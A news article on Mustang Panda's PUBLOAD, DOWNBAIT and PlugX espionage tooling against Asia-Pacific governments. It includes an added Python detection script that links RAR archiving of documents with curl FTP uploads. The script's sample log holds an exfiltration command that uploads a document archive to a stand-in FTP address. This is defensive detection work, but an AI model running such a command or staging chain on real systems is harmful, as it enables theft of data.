Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments

By Admin, September 10, 2024

September 10, 2024 | Ravi Lakshmanan | Cyber attack / malware
The threat actor tracked as Mustang Panda has refined its malware arsenal with new tools that facilitate data theft and the deployment of next-stage payloads, according to new findings from Trend Micro.

The cybersecurity firm, which tracks the activity cluster as Earth Preta, said it observed "the distribution of PUBLOAD via a variant of the HIUPAN worm."

PUBLOAD is a known downloader malware associated with Mustang Panda since early 2022, deployed in cyberattacks targeting government organizations in the Asia-Pacific (APAC) region to deliver the PlugX malware.

“PUBLOAD was also used to inject additional tools into the target environment, such as FDMTP, which served as a secondary management tool that was observed to perform tasks similar to PUBLOAD; and PTSOCKET, a tool used as an alternative to exfiltration,” said security researchers Lennart Bermejo, Sunny Lu and Ted Lee.

Mustang Panda's use of removable drives as a distribution vector for HIUPAN was previously documented by Trend Micro in March 2023. Google-owned Mandiant tracks the same activity as FOG CLOAK, which it observed in connection with a cyberespionage campaign targeting the Philippines that may have begun as early as September 2021.

PUBLOAD is equipped with functions to perform reconnaissance of an infected network and to collect files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt and .pptx), while also serving as a conduit for a new hacking tool called FDMTP, described as "a simple malware downloader" implemented on top of the TouchSocket framework's Duplex Message Transfer Protocol (DMTP).

The collected information is compressed into a RAR archive and transmitted to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been seen deploying a custom program called PTSOCKET that can transfer files in multi-threaded mode.
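The collection-then-exfiltration chain described above (documents archived into a RAR file, then pushed to an FTP site with cURL) is something a detection engineer can correlate from process-creation telemetry. The following is an added example, not Trend Micro's or the malware author's code; the log format, hostnames, paths and the 203.0.113.10 address are all constructed.

```python
import shlex

# Document types the article lists as PUBLOAD's collection targets
DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".pdf", ".ppt", ".pptx")

# Constructed process-creation events, one per line: host|user|image|command_line
SAMPLE_EVENTS = [
    "ws-12|alice|C:\\Program Files\\WinRAR\\rar.exe|rar a -r C:\\Temp\\out.rar *.docx *.pdf *.xlsx",
    "ws-12|alice|C:\\Windows\\System32\\curl.exe|curl -T C:\\Temp\\out.rar ftp://203.0.113.10/up/ --user u:p",
    "ws-07|bob|C:\\Windows\\System32\\curl.exe|curl -o setup.exe https://example.com/setup.exe",
    "ws-07|bob|C:\\Program Files\\WinRAR\\rar.exe|rar a C:\\Temp\\backup.rar C:\\Projects\\src",
]

def parse_event(line):
    host, user, image, cmd = line.split("|", 3)
    # posix=False keeps Windows backslashes intact while still honouring quotes
    return {"host": host, "user": user, "image": image.lower(), "args": shlex.split(cmd, posix=False)}

def doc_archive_target(ev):
    """If this is rar.exe adding document types to an archive, return the archive path."""
    if not ev["image"].endswith("rar.exe") or ev["args"][1:2] != ["a"]:
        return None
    if not any(a.lower().endswith(DOC_EXTS) for a in ev["args"]):
        return None
    return next((a for a in ev["args"] if a.lower().endswith(".rar")), None)

def ftp_upload_file(ev):
    """If this is curl uploading a file (-T/--upload-file) to an FTP URL, return that file."""
    args = ev["args"]
    if not ev["image"].endswith("curl.exe") or not any(a.lower().startswith(("ftp://", "ftps://")) for a in args):
        return None
    for i, a in enumerate(args[:-1]):
        if a in ("-T", "--upload-file"):
            return args[i + 1]
    return None

def detect(lines):
    """Alert when a RAR built from documents on a host is later pushed to an FTP site by curl."""
    staged = {}  # host -> set of lowercased archive paths created from documents
    alerts = []
    for line in lines:
        ev = parse_event(line)
        rar = doc_archive_target(ev)
        if rar:
            staged.setdefault(ev["host"], set()).add(rar.lower())
        uploaded = ftp_upload_file(ev)
        if uploaded and uploaded.lower() in staged.get(ev["host"], set()):
            alerts.append((ev["host"], ev["user"], uploaded))
    return alerts
```

Running `detect(SAMPLE_EVENTS)` flags only ws-12, where the same archive built from documents is then handed to `curl -T` with an FTP destination; bob's ordinary backup and download on ws-07 match neither half of the chain and stay quiet.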

Additionally, Trend Micro attributes to the adversary a "fast-evolving" phishing campaign it discovered in June 2024, which distributed emails carrying a .url attachment that, when launched, delivers a signed downloader called DOWNBAIT.

The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, based on the file names and contents of the decoy documents.

DOWNBAIT is a first-stage loader used to retrieve and execute the PULLBAIT shellcode in memory, which in turn downloads and runs a first-stage backdoor called CBROVER.

The implant, for its part, supports file upload and remote shell execution, and acts as a delivery vehicle for the PlugX remote access trojan (RAT). PlugX then takes care of deploying another file collector, called FILESAC, that harvests the victim's files.

The disclosure comes as Palo Alto Networks Unit 42 detailed Mustang Panda's abuse of the reverse shell functionality built into Visual Studio Code to gain a foothold in targeted networks, a sign that the threat actor is actively changing its modus operandi.

“Earth Preta has demonstrated significant progress in its malware deployment and strategies, particularly in its campaigns targeting government organizations,” the researchers said. “The group developed their tactics by (…) using multi-stage bootloaders (from DOWNBAIT to PlugX) and possibly using Microsoft cloud services to steal data.”
